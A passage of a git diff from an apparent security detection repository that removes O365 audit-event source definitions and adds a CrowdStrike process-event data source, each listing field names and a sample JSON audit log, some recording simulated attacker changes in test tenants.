"S-1-1-0", "MemberUpn": "Everyone", "Name": "Inbox", "Path": "\\Inbox"}}}'
diff --git a/data_sources/cloud/event_sources/O365_Set-Mailbox.yml b/data_sources/cloud/event_sources/O365_Set-Mailbox.yml
deleted file mode 100644
index 59f8a227e1..0000000000
--- a/data_sources/cloud/event_sources/O365_Set-Mailbox.yml
+++ /dev/null
@@ -1,73 +0,0 @@
-event_name: O365 Set-Mailbox
-fields:
-- _time
-- AppId
-- ClientAppId
-- ClientIP
-- CreationTime
-- ExternalAccess
-- Id
-- Identity
-- ObjectId
-- Operation
-- OrganizationId
-- OrganizationName
-- OriginatingServer
-- Parameters{}.Name
-- Parameters{}.Value
-- Params
-- RecordType
-- ResultStatus
-- SessionId
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- eventtype
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_id
-- punct
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_user
-- src_user_type
-- status
-- tag
-- tag::eventtype
-- tenant_id
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_account
-- vendor_product
-example_log: '{"AppId": "", "ClientAppId": "", "ClientIP": "18.192.200.190:52816", "CreationTime": "2020-12-16T12:32:28", "ExternalAccess": false, "Id": "a6a52406-0912-448d-36eb-08d8a1bea6be", "ObjectId": "bpatel", "Operation": "Set-Mailbox", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "OrganizationName": "rodsoto.onmicrosoft.com", "OriginatingServer": "PH0PR14MB4341 (15.20.3654.025)", "Parameters": [{"Name": "ForwardingAddress", "Value": ""}, {"Name": "Identity", "Value": "bpatel@rodsoto.onmicrosoft.com"}], "RecordType": 1, "ResultStatus": "True", "SessionId": "86a7cd7c-3f42-4b68-b670-4024b5461a80", "UserId": "pbareiss@rodsoto.onmicrosoft.com", "UserKey": "10032001020A3408", "UserType": 2, "Version": 1, "Workload": "Exchange"}'
diff --git a/data_sources/cloud/event_sources/O365_Set_Company_Information.yml b/data_sources/cloud/event_sources/O365_Set_Company_Information.yml
deleted file mode 100644
index ee428c5f9b..0000000000
--- a/data_sources/cloud/event_sources/O365_Set_Company_Information.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: O365 Set Company Information.
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- ClientIP
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- extended_properties
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"Actor": [{"ID": "bpatel@rodsoto.onmicrosoft.com", "Type": 5}, {"ID": "100320010208B5DC", "Type": 3}, {"ID": "User_425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "425b75db-38be-4c7b-a474-5f0709247370", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "ActorIpAddress": "", "AzureActiveDirectoryEventType": 1, "ClientIP": "", "CreationTime": "2021-01-13T22:57:21", "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{}"}, {"Name": "extendedAuditEventCategory", "Value": "Company"}], "Id": "50a62783-f9d7-472c-9e44-f4f3d346e53c", "InterSystemsId": "6f435e84-e95b-44da-820f-2d2c9c237293", "IntraSystemId": "1163f0db-2241-4689-8486-b15c7812bbe0", "ModifiedProperties": [{"Name": "StrongAuthenticationPolicy", "NewValue": "[\r\n {\r\n \"RelyingPartyStrongAuthenticationPolicies\": [\r\n {\r\n \"RelyingParties\": [\r\n \"*\"\r\n ],\r\n \"Rules\": [\r\n {\r\n \"SelectionConditions\": [\r\n {\r\n \"Claim\": 1,\r\n \"Operator\": 0,\r\n \"Values\": [\r\n \"73.15.72.101/32\",\r\n \"66.176.252.11/32\"\r\n ]\r\n }\r\n ]\r\n }\r\n ],\r\n \"Enabled\": true\r\n }\r\n ]\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"RelyingPartyStrongAuthenticationPolicies\": [\r\n {\r\n \"RelyingParties\": [\r\n \"*\"\r\n ],\r\n \"Rules\": [\r\n {\r\n \"SelectionConditions\": [\r\n {\r\n \"Claim\": 1,\r\n \"Operator\": 0,\r\n \"Values\": [\r\n \"73.15.72.101/32\",\r\n \"66.176.252.11/32\"\r\n ]\r\n }\r\n ]\r\n },\r\n {\r\n \"SelectionConditions\": [\r\n {\r\n \"Claim\": 2,\r\n \"Operator\": 0,\r\n \"Values\": [\r\n \"insidecorporatenetwork--true\"\r\n ]\r\n }\r\n ]\r\n }\r\n ],\r\n \"Enabled\": true\r\n }\r\n ]\r\n }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationPolicy", "OldValue": ""}], "ObjectId": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Operation": "Set Company Information.", "OrganizationId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "RecordType": 8, "ResultStatus": "Success", 
"SupportTicketId": "", "Target": [{"ID": "Company_0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "Type": 2}, {"ID": "Directory", "Type": 2}, {"ID": "Emergency Information Technology Services LLC", "Type": 1}], "TargetContextId": "0e8108b1-18e9-41a4-961b-dfcddf92ef08", "UserId": "bpatel@rodsoto.onmicrosoft.com", "UserKey": "100320010208B5DC@rodsoto.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_application.yml b/data_sources/cloud/event_sources/O365_Update_application.yml
deleted file mode 100644
index 999f3d2597..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_application.yml
+++ /dev/null
@@ -1,76 +0,0 @@
-event_name: O365 Update application.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-09-01T17:16:20", "Id": "c428c85c-4fa0-4e97-9033-6a76d9dee45d", "Operation": "Update application.", "OrganizationId": "58aee3b9-7433-46a0-b54e-2429487992a0", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@contoso.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "UserId": "attacker@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\",\"AppId\":\"95106c0e-3519-450e-8e38-7f326d873454\"}"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}], "ModifiedProperties": [{"Name": "RequiredResourceAccess", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n },\r\n {\r\n \"EntitlementId\": \"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"b633e1c5-b582-4048-a93e-9f11b44c7e96\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "RequiredResourceAccess", "OldValue": ""}], "Actor": [{"ID": "attacker@contoso.onmicrosoft.com", "Type": 5}, 
{"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "Type": 2}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "58aee3b9-7433-46a0-b54e-2429487992a0", "InterSystemsId": "6a0bc9d4-eb2d-4eb0-a524-601dac6914a6", "IntraSystemId": "a2d4d7c4-727c-401b-9e6c-70413a080855", "SupportTicketId": "", "Target": [{"ID": "Application_a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "a2d68f8b-ab9f-47ac-934f-b966c3ac134f", "Type": 2}, {"ID": "Application", "Type": 2}, {"ID": "TestApp2", "Type": 1}, {"ID": "95106c0e-3519-450e-8e38-7f326d873454", "Type": 2}], "TargetContextId": "58aee3b9-7433-46a0-b54e-2429487992a0"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml b/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml
deleted file mode 100644
index eb5502b107..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_authorization_policy.yml
+++ /dev/null
@@ -1,68 +0,0 @@
-event_name: O365 Update authorization policy.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- additionalDetails
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_agent_change
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-26T19:22:20", "Id": "83774e72-313f-4d1f-8609-7d0c7bb3b4ff", "Operation": "Update authorization policy.", "OrganizationId": "a417c578-c7ee-480d-a225-d48057e74df5", "RecordType": 8, "ResultStatus": "Success", "UserKey": "1003BFFD98415B4E@splunkresearch.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "UserId": "user30@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Swagger-Codegen/1.0.0.0/csharp/msal\"}"}, {"Name": "extendedAuditEventCategory", "Value": "AuthorizationPolicy"}], "ModifiedProperties": [{"Name": "AllowUserConsentForRiskyApps", "NewValue": "[\r\n true\r\n]", "OldValue": "[\r\n false\r\n]"}, {"Name": "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "NewValue": "[\r\n \"microsoft-user-default-legacy\"\r\n]", "OldValue": "[\r\n \"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole", "OldValue": ""}], "Actor": [{"ID": "user30@splunkresearch.onmicrosoft.com", "Type": 5}, {"ID": "1003BFFD98415B4E", "Type": 3}, {"ID": "User_e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "e4c722ac-3b83-478d-8f52-c388885dc30f", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "a417c578-c7ee-480d-a225-d48057e74df5", "InterSystemsId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065", "IntraSystemId": "92a0d051-2d0d-4608-9d09-6fca619764a2", "SupportTicketId": "", "Target": [{"ID": "AuthorizationPolicy_24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "24484114-1daa-4700-aaf7-44ee5cbe5678", "Type": 2}, {"ID": "Other", "Type": 2}, {"ID": "Authorization Policy", "Type": 1}], "TargetContextId": "a417c578-c7ee-480d-a225-d48057e74df5"}'
diff --git a/data_sources/cloud/event_sources/O365_Update_user.yml b/data_sources/cloud/event_sources/O365_Update_user.yml
deleted file mode 100644
index 0242d8933f..0000000000
--- a/data_sources/cloud/event_sources/O365_Update_user.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: O365 Update user.
-fields:
-- _time
-- ActorContextId
-- Actor{}.ID
-- Actor{}.Type
-- AzureActiveDirectoryEventType
-- CreationTime
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- ModifiedProperties{}.Name
-- ModifiedProperties{}.NewValue
-- ModifiedProperties{}.OldValue
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- ResultStatus
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- additionalDetails
-- app
-- authentication_service
-- change_type
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- extendedAuditEventCategory
-- host
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src_user
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-20T19:32:59", "Id": "d06df1c6-b3f2-4595-90b9-99b8f91811c3", "Operation": "Update user.", "OrganizationId": "99825d50-9544-4061-8e46-68923805cbf2", "RecordType": 8, "ResultStatus": "Success", "UserKey": "10032002CC029AE9@splunkresearch1.onmicrosoft.com", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ObjectId": "victim@splunkresearch1.onmicrosoft.com", "UserId": "victim@splunkresearch1.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "additionalDetails", "Value": "{\"UserType\":\"Member\"}"}, {"Name": "extendedAuditEventCategory", "Value": "User"}], "ModifiedProperties": [{"Name": "StrongAuthenticationMethod", "NewValue": "[\r\n {\r\n \"MethodType\": 7,\r\n \"Default\": false\r\n },\r\n {\r\n \"MethodType\": 6,\r\n \"Default\": true\r\n },\r\n {\r\n \"MethodType\": 0,\r\n \"Default\": false\r\n },\r\n {\r\n \"MethodType\": 5,\r\n \"Default\": false\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"MethodType\": 6,\r\n \"Default\": true\r\n },\r\n {\r\n \"MethodType\": 7,\r\n \"Default\": false\r\n }\r\n]"}, {"Name": "StrongAuthenticationRequirement", "NewValue": "[\r\n {\r\n \"RelyingParty\": \"*\",\r\n \"State\": 0,\r\n \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n }\r\n]", "OldValue": "[\r\n {\r\n \"RelyingParty\": \"*\",\r\n \"State\": 1,\r\n \"RememberDevicesNotIssuedBefore\": \"2023-10-19T16:11:43+00:00\"\r\n }\r\n]"}, {"Name": "Included Updated Properties", "NewValue": "StrongAuthenticationMethod, StrongAuthenticationRequirement", "OldValue": ""}, {"Name": "TargetId.UserType", "NewValue": "Member", "OldValue": ""}], "Actor": [{"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}, {"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}], "ActorContextId": "99825d50-9544-4061-8e46-68923805cbf2", "InterSystemsId": 
"533a45c6-4f9a-4527-ad8d-e8fec5c7d8e4", "IntraSystemId": "32734207-053e-4ad1-87a3-4da1dfa69c58", "SupportTicketId": "", "Target": [{"ID": "User_57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 2}, {"ID": "User", "Type": 2}, {"ID": "victim@splunkresearch1.onmicrosoft.com", "Type": 5}, {"ID": "10032002CC029AE9", "Type": 3}], "TargetContextId": "99825d50-9544-4061-8e46-68923805cbf2"}'
diff --git a/data_sources/cloud/event_sources/O365_UserLoggedIn.yml b/data_sources/cloud/event_sources/O365_UserLoggedIn.yml
deleted file mode 100644
index 3884ec04a8..0000000000
--- a/data_sources/cloud/event_sources/O365_UserLoggedIn.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: O365 UserLoggedIn
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- ApplicationId
-- AzureActiveDirectoryEventType
-- BrowserType
-- ClientIP
-- CreationTime
-- DeviceProperties{}.Name
-- DeviceProperties{}.Value
-- ErrorNumber
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- OS
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- RequestType
-- ResultStatus
-- ResultStatusDetail
-- SessionId
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserAgent
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- app
-- authentication_service
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- host
-- index
-- linecount
-- object
-- punct
-- record_type
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- timeendpos
-- timestartpos
-- user
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-12-04T20:42:05", "Id": "52d72a62-132b-487b-bb7f-c4c119f90700", "Operation": "UserLoggedIn", "OrganizationId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "RecordType": 15, "ResultStatus": "Success", "UserKey": "2d2f9e2c-8350-4d98-852e-3f06daaf7185", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "54.68.231.63", "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "UserId": "user15@splunkresearch.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}], "ModifiedProperties": [], "Actor": [{"ID": "2d2f9e2c-8350-4d98-852e-3f06daaf7185", "Type": 0}, {"ID": "user15@splunkresearch.onmicrosoft.com", "Type": 5}], "ActorContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ActorIpAddress": "54.68.231.63", "InterSystemsId": "6463a6ad-27ec-b311-dc52-ecdde38d9492", "IntraSystemId": "52d72a62-132b-487b-bb7f-c4c119f90700", "SupportTicketId": "", "Target": [{"ID": "00000002-0000-0ff1-ce00-000000000000", "Type": 0}], "TargetContextId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "DeviceProperties": [{"Name": "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Firefox"}, {"Name": "SessionId", "Value": "15e27956-79a0-45b2-9d02-60f48349f692"}], "ErrorNumber": "0"}'
diff --git a/data_sources/cloud/event_sources/O365_UserLoginFailed.yml b/data_sources/cloud/event_sources/O365_UserLoginFailed.yml
deleted file mode 100644
index cdbb6a8262..0000000000
--- a/data_sources/cloud/event_sources/O365_UserLoginFailed.yml
+++ /dev/null
@@ -1,84 +0,0 @@
-event_name: O365 UserLoginFailed
-fields:
-- _time
-- ActorContextId
-- ActorIpAddress
-- Actor{}.ID
-- Actor{}.Type
-- ApplicationId
-- AzureActiveDirectoryEventType
-- BrowserType
-- ClientIP
-- CreationTime
-- DeviceProperties{}.Name
-- DeviceProperties{}.Value
-- ErrorNumber
-- ExtendedProperties{}.Name
-- ExtendedProperties{}.Value
-- Id
-- InterSystemsId
-- IntraSystemId
-- IsCompliantAndManaged
-- LogonError
-- OS
-- ObjectId
-- Operation
-- OrganizationId
-- RecordType
-- RequestType
-- ResultStatus
-- ResultStatusDetail
-- SupportTicketId
-- TargetContextId
-- Target{}.ID
-- Target{}.Type
-- UserAgent
-- UserAuthenticationMethod
-- UserId
-- UserKey
-- UserType
-- Version
-- Workload
-- action
-- app
-- authentication_method
-- authentication_service
-- command
-- dataset_name
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_name
-- dvc
-- event_type
-- eventtype
-- host
-- index
-- linecount
-- object
-- punct
-- reason
-- record_type
-- result
-- signature
-- source
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- status
-- tag
-- tag::action
-- tag::eventtype
-- user
-- user_agent
-- user_type
-- vendor_account
-- vendor_product
-example_log: '{"CreationTime": "2023-10-10T17:08:65", "Id": "4593aac8-855f-4341-9d2a-4289146eb800", "Operation": "UserLoginFailed", "OrganizationId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "RecordType": 15, "ResultStatus": "Failed", "UserKey": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "UserType": 0, "Version": 1, "Workload": "AzureActiveDirectory", "ClientIP": "52.3.21.4", "ObjectId": "Unknown", "UserId": "user30@contoso.onmicrosoft.com", "AzureActiveDirectoryEventType": 1, "ExtendedProperties": [{"Name": "ResultStatusDetail", "Value": "UserError"}, {"Name": "UserAgent", "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "OAuth2:Token"}], "ModifiedProperties": [], "Actor": [{"ID": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "Type": 0}, {"ID": "user30@contoso.onmicrosoft.com", "Type": 5}], "ActorContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "ActorIpAddress": "52.3.21.4", "InterSystemsId": "97e59adc-b4be-4ea6-8f17-b46677242190", "IntraSystemId": "eeeba3a0-c619-437a-9879-3dd009f9bf00", "SupportTicketId": "", "Target": [{"ID": "Unknown", "Type": 0}], "TargetContextId": "d541aae6-6b73-4a7c-aaf0-a4de30c872bc", "ApplicationId": "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223", "DeviceProperties": [{"Name": "OS", "Value": "Windows10"}, {"Name": "BrowserType", "Value": "Chrome"}, {"Name": "IsCompliantAndManaged", "Value": "False"}], "ErrorNumber": "50126", "LogonError": "InvalidUserNameOrPassword"}'
diff --git a/data_sources/crowdstrike_processrollup2.yml b/data_sources/crowdstrike_processrollup2.yml
new file mode 100644
index 0000000000..d05927785e
--- /dev/null
+++ b/data_sources/crowdstrike_processrollup2.yml
@@ -0,0 +1,108 @@
+name: CrowdStrike ProcessRollup2
+id: cbb06880-9dd9-4542-ac60-bd6e5d3c3e4e
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for CrowdStrike ProcessRollup2
+source: crowdstrike
+sourcetype: crowdstrike:events:sensor
+separator: event_simpleName
+supported_TA:
+- name: CrowdStrike Falcon Event Streams Technical Add-On
+ url: https://splunkbase.splunk.com/app/5082
+ version: 3.2.1
+fields:
+- AuthenticationId
+- AuthenticationId_meaning
+- AuthenticodeHashData
+- CommandLine
+- ConfigBuild
+- ConfigStateHash
+- EffectiveTransmissionClass
+- Entitlements
+- EventOrigin
+- ImageFileName
+- ImageSubsystem
+- ImageSubsystem_meaning
+- IntegrityLevel
+- IntegrityLevel_meaning
+- MD5HashData
+- ParentAuthenticationId
+- ParentBaseFileName
+- ParentProcessId
+- ProcessCreateFlags
+- ProcessEndTime
+- ProcessParameterFlags
+- ProcessParameterFlags_meaning
+- ProcessStartTime
+- ProcessSxsFlags
+- ProcessSxsFlags_meaning
+- RawProcessId
+- SHA1HashData
+- SHA256HashData
+- SessionId
+- SignInfoFlags
+- SignInfoFlags_meaning
+- SourceProcessId
+- SourceThreadId
+- Tags
+- TargetProcessId
+- TokenType
+- TokenType_meaning
+- UserSid
+- WindowFlags
+- WindowFlags_meaning
+- action
+- aid
+- aid_city
+- aid_computer_name
+- aid_continent
+- aid_country
+- aid_machine_domain
+- aid_os_version
+- aid_ou
+- aid_site_name
+- aid_system_product_name
+- aip
+- cid
+- dest
+- event_ingest_time
+- event_platform
+- event_simpleName
+- eventtype
+- host_res_aid
+- id
+- os
+- parent_process_exec
+- parent_process_id
+- parent_process_name
+- process
+- process_exec
+- process_hash
+- process_id
+- process_integrity_level
+- process_name
+- process_path
+- resolve_dest
+- resolve_process_integrity_level
+- tag
+- timestamp
+- user
+- user_id
+- vendor_product
+field_mappings:
+ - data_model: cim
+ data_set: Endpoint.Processes
+ mapping:
+ CommandLine: Processes.process
+ ImageFileName: Processes.process_path
+ ParentBaseFileName: Processes.parent_process_name
+ ParentProcessId: Processes.parent_process_id
+ RawProcessId: Processes.process_id
+ SHA256HashData: Processes.process_hash
+ UserSid: Processes.user
+example_log: '{"LinkName":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start
+ Menu\\Programs\\Windows PowerShell\\Windows PowerShell.lnk","ProcessCreateFlags":"67634196","IntegrityLevel":"12288","ParentProcessId":"5459598860","SourceProcessId":"5459598860","aip":"3.126.231.40","SHA1HashData":"0000000000000000000000000000000000000000","UserSid":"S-1-5-21-586445407-708991241-1829972403-500","event_platform":"Win","TokenType":"1","ProcessEndTime":"","AuthenticodeHashData":"3b98faafc17b47beb9027c437fceeafdf0624a1c","ParentBaseFileName":"explorer.exe","EventOrigin":"1","ImageSubsystem":"3","id":"e2210781-0e8f-47d2-bf6a-56d2c59f38ee","EffectiveTransmissionClass":"3","SessionId":"2","ShowWindowFlags":"1","Tags":"27,
+ 40, 151, 874, 924, 12094627905582, 12094627906234, 211106232533012, 212205744161605,
+ 263882790666253","timestamp":"1713805173418","event_simpleName":"ProcessRollup2","RawProcessId":"5012","ConfigStateHash":"840884426","MD5HashData":"097ce5761c89434367598b34fe32893b","SHA256HashData":"ba4038fd20e474c047be8aad5bfacdb1bfc1ddbe12f803f473b7918d8d819436","ProcessSxsFlags":"64","AuthenticationId":"2669499","ConfigBuild":"1007.3.0018207.1","WindowFlags":"3073","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"
